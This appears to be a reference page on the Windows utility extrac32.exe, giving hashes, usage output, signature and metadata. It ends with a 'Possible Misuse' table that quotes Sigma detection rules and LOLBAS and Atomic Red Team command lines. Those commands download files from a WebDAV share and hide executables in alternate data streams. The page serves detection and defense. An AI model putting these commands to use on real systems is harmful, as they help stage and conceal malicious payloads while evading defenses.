extrac32.exe

  • File Path: C:\WINDOWS\SysWOW64\extrac32.exe
  • Description: Microsoft CAB File Extract Utility

Hashes

Type Hash
MD5 F8884E39A620402DA6D6CCA9D7BC3A2B
SHA1 C6A6E9F09DEE9984FA11D261F021EDEDBC5980F0
SHA256 BD050055F7E9538CD77C7530649CC17ABE9936E488AF82E70DD31749E0593C20
SHA384 A9EE1308403832161365ADD8D6D29BBA65562A797700A3098E82EAD42FF1ABEB82FA425D03FB770119606F21DDBDC9A7
SHA512 F4A7D1582EC34B296DCCE138067460AE815647C3B2ED52A69036F0F81A8DCC682E6F46CBE6071D36557BBACC001F0DCA4932B287B74375E0FFA8A907C4697F70
SSDEEP 768:wYDhe6vupie/6tnrNZiQoUuPq+GN0ZnFOsuwueArHu3dxH:wOhequp0cQoU+q+IBKueR3d

Runtime Data

Usage (stdout):

Microsoft (R) Cabinet Extraction Tool
Copyright (c) Microsoft Corporation. All rights reserved..

 Cabinet help

11-23-2014  6:00:50p A---       593,606 ReportingEvents.log
05-24-2020 10:20:16p A---     5,312,512 Microsoft-Windows-AppXDeploymentServer-Operational.evtx
05-24-2020 10:20:16p A---    19,992,576 Microsoft-Windows-Store-Operational.evtx
05-24-2020 10:20:18p A---     1,118,208 Microsoft-Windows-WindowsUpdateClient-Operational.evtx
05-24-2020 10:20:18p A---        69,632 Microsoft-Windows-TWinUI-Operational.evtx
06-02-2020 10:29:50p A---       139,264 WindowsUpdate.20200602.222902.536.10.etl
06-02-2020 10:29:54p A---        81,920 WindowsUpdate.20200602.222902.536.11.etl
06-02-2020 10:29:46p A---       139,264 WindowsUpdate.20200602.222902.536.8.etl
06-02-2020 10:29:48p A---       139,264 WindowsUpdate.20200602.222902.536.9.etl
06-02-2020 11:12:54p A---        90,112 WindowsUpdate.20200602.231253.970.1.etl
06-03-2020 11:04:44a A---        16,384 WindowsUpdate.20200603.110442.751.1.etl
06-03-2020  2:02:42p A---        98,304 WindowsUpdate.20200603.140241.068.1.etl
06-03-2020  3:04:48p A---        16,384 WindowsUpdate.20200603.150446.713.1.etl
06-03-2020  4:16:14p A---        16,384 WindowsUpdate.20200603.161612.985.1.etl
06-03-2020  6:07:50p A---       139,264 WindowsUpdate.20200603.180748.524.1.etl
06-03-2020  6:08:06p A---       139,264 WindowsUpdate.20200603.180748.524.2.etl
06-03-2020  6:19:16p A---         8,192 WindowsUpdate.20200603.180748.524.3.etl
06-03-2020  6:21:32p A---       102,400 WindowsUpdate.20200603.182130.427.1.etl
06-03-2020  7:02:24p A---        98,304 WindowsUpdate.20200603.190222.170.1.etl
06-03-2020  7:19:46p A---        20,480 WindowsUpdate.20200603.191944.059.1.etl
06-03-2020  8:02:22p A---       139,264 WindowsUpdate.20200603.200220.394.1.etl
06-03-2020  8:02:26p A---       139,264 WindowsUpdate.20200603.200220.394.2.etl
06-03-2020  8:02:28p A---       139,264 WindowsUpdate.20200603.200220.394.3.etl
06-03-2020  8:02:36p A---        86,016 WindowsUpdate.20200603.200220.394.4.etl
06-03-2020  8:40:24p A---        16,384 WindowsUpdate.20200603.204022.182.1.etl
06-03-2020  9:01:54p A---        20,480 WindowsUpdate.20200603.210152.059.1.etl
06-03-2020  9:15:08p A---        16,384 WindowsUpdate.20200603.211506.884.1.etl
06-03-2020 10:08:26p A---        16,384 WindowsUpdate.20200603.220825.308.1.etl
06-03-2020 11:02:50p A---        32,768 WindowsUpdate.20200603.230248.991.1.etl
06-04-2020 10:16:22a A---        16,384 WindowsUpdate.20200604.101621.122.1.etl
06-04-2020 11:05:48a A---        16,384 WindowsUpdate.20200604.110547.588.1.etl
06-04-2020 12:13:02p A---        16,384 WindowsUpdate.20200604.121301.541.1.etl
06-04-2020  1:30:16p A---        16,384 WindowsUpdate.20200604.133015.279.1.etl
06-04-2020  2:02:42p A---       102,400 WindowsUpdate.20200604.140241.036.1.etl
06-04-2020  3:03:56p ----         8,192 WindowsUpdate.20200604.150354.879.1.etl
                35 Files     29,114,054 bytes

Signature

  • Status: Signature verified.
  • Serial: 330000023241FB59996DCC4DFF000000000232
  • Thumbprint: FF82BC38E1DA5E596DF374C53E3617F7EDA36B06
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: extrac32.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 5.00 (WinBuild.160101.0800)
  • Product Version: 5.00
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of extrac32.exe being misused. While extrac32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_lolbas_extrac32.yml title: Suspicious Extrac32 Execution DRL 1.0
sigma proc_creation_win_lolbas_extrac32.yml description: Download or Copy file with Extrac32 DRL 1.0
sigma proc_creation_win_lolbas_extrac32.yml - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ DRL 1.0
sigma proc_creation_win_lolbas_extrac32.yml - extrac32.exe DRL 1.0
sigma proc_creation_win_lolbas_extrac32_ads.yml title: Suspicious Extrac32 Alternate Data Stream Execution DRL 1.0
sigma proc_creation_win_lolbas_extrac32_ads.yml - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/ DRL 1.0
sigma proc_creation_win_lolbas_extrac32_ads.yml - extrac32.exe DRL 1.0
LOLBAS Extrac32.yml Name: Extrac32.exe  
LOLBAS Extrac32.yml - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe  
LOLBAS Extrac32.yml - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe  
LOLBAS Extrac32.yml - Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt  
LOLBAS Extrac32.yml - Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe  
LOLBAS Extrac32.yml - Path: C:\Windows\System32\extrac32.exe  
LOLBAS Extrac32.yml - Path: C:\Windows\SysWOW64\extrac32.exe  
atomic-red-team T1564.004.md extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.